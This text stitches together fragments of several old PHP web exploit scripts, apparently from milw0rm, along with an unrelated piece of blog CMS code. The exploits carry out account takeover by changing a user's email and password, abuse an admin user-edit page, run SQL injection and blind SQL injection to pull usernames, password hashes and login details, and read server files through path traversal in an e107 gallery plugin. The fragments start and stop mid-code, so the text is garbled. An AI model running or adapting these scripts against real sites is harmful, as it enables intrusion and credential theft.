sendpacket($packet2); if (stristr($html, 'i=1') == true) { die('Error : Incorrect username or password! Try again!'); } else { if (stristr($html, 'i=5') == true) { die('Error : Someone is currently using that account!'); } else { $RandMail = substr($PHPSESSID, 10, 6) . '*****@*****.**'; } } $Query3 = $path . 'index.php?n=modules/panel&a=2&tmp[authorization]=4'; $packet3 = "POST \n{$Query3}&editpassword=&editpassword2=&editemail={$RandMail}&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID={$PHPSESSID} \nHTTP/1.1\r\n"; $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet3 .= "Host: " . $host . "\r\n"; $packet3 .= "Connection: Close\r\n\r\n"; sendpacket($packet3); if (stristr($html, 'i=26') == false) { die('Exploit Failed'); } $Query4 = $path . 'index.php?n=modules/login&a=1'; $packet4 = "POST {$Query4}&PHPSESSID={$PHPSESSID} HTTP/1.1\r\n"; $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet4 .= "Host: " . $host . "\r\n"; $packet4 .= "Connection: Close\r\n\r\n"; sendpacket($packet4); die('Exploit succeeded! You have Full access now!'); } ?>
-----------------------------7d6224c08dc Content-Disposition: form-data; name="State" aaaaaa -----------------------------7d6224c08dc Content-Disposition: form-data; name="Country" Iran -----------------------------7d6224c08dc Content-Disposition: form-data; name="Status" Active -----------------------------7d6224c08dc '; echo "Powered By Y! Underground Group\r\n"; echo "discovered&Coded By Dj7xpl\r\n"; echo "Sending Data To Target ...\n"; /*Sending Data*/ $packet = "POST " . $p . "admin/editusers.php?Uid=" . $uid . " HTTP/1.0\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacket($packet); sleep(1); echo "Change Passw0rd Now!\n"; ?> # milw0rm.com [2007-04-30]
$sql = " FROM forum_userdata WHERE user_name='" . $username . "'/*"; $sql = urlencode($sql); if ($proxy == '') { $packet = "GET " . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n"; } else { $packet = "GET http://" . $host . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n"; } $packet .= "Client-IP: 127.0.0.1\r\n"; $packet .= "X-Forwarded-For: 127.0.0.1\r\n"; $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet .= "Referer: http://" . $host . $path . "search.php\r\n"; $packet .= "Accept-Language: en\r\n"; $packet .= "Accept-Encoding: gzip, deflate\r\n"; $packet .= "User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Keep-Alive\r\n\r\n"; show($packet); sendpacket($packet, 0); $temp = explode(';<span class="category">(', $html); $temp2 = explode(')</span>', $temp[1]); $hash = $temp2[0]; echo '<br>username: '******' hash: ' . $hash; # debugging... //echo htmlentities($html); } else { echo '<br>fill in all requested fields, optionally specify a proxy...<br>'; } ?> # milw0rm.com [2005-09-22]
function getlogindetails($p, $msg, $tsqli) { echo $msg; $tempvar = ""; $j = 1; while (!strstr($tempvar, chr(0))) { for ($i = 1; $i <= 126; $i++) { if (!strpos($tsqli, "load_file") == true) { $sqli = $tsqli . "+limit+0,1)," . $j . ",1))='" . $i; } else { $sqli = $tsqli . ")," . $j . ",1))='" . $i; } $packet = "GET " . $p . "index.php?cmd=blog&post=1" . $sqli . " HTTP/1.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strlen($html) > 429) { echo chr($i); break; } elseif ($i === 126) { $tempvar .= ""; break; } } $j++; } }
$DB->unbuffered_query("UPDATE {$db_prefix}statistics SET article_count=article_count" . $query . "1"); $DB->unbuffered_query("UPDATE {$db_prefix}users SET articles=articles" . $query . "1 WHERE userid='{$sax_uid}'"); } archives_recache(); hottags_recache(); categories_recache(); statistics_recache(); newarticles_recache(); if ($pingurl && $pingagain) { $pingurldb = explode("\n", $pingurl); foreach ($pingurldb as $pingurl) { $pingurl = trim($pingurl); if ($pingurl) { $url = str_replace('show&id', 'show&id', getpermalink($article['articleid'], $article['alias'])); $data = 'url=' . rawurlencode($url) . '&title=' . rawurlencode($article['title']) . '&blog_name=' . rawurlencode($options['name']) . '&excerpt=' . rawurlencode($article['content']); $result = sendpacket($pingurl, $data); /* if (strpos($result, 'error>0</error')) { //succ } else { //fa }*/ } } } if ($article['stick'] != $stick) { stick_recache(); } $location = getlink('article', 'mod', array('message' => 13, 'articleid' => $articleid)); } header("Location: {$location}");
[o] Greetz [o] ============== MainHack BrotherHood [ http://news.serverisdown.org ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang H312Y yooogy mousekill }^-^{ loqsa zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke F**K TERORIS!! */ $vuln = '/e107_plugins/my_gallery/image.php?file='; $trasv = '/../../../../../../../../../../../../../../..'; echo "<form method=POST>\nWeb 2 XPL : <input type=\"text\" name=\"host\" size=30>\nFile 2 Read : <input type=\"text\" name=\"file\" size=30>\n<input type=submit value=\"Go!!!\" name=\"_xpl\">\n<br><br>"; if ($_POST['_xpl']) { $data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Connection: close\r\n\r\n"; $html = sendpacket($host, $data); print '<pre>' . htmlspecialchars($html) . '</pre>'; } echo "</form>"; function sendpacket($host, $data) { if (!($sock = @fsockopen($host, 80))) { die("[!] Connection refused, try again!\n"); } fputs($sock, $data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; }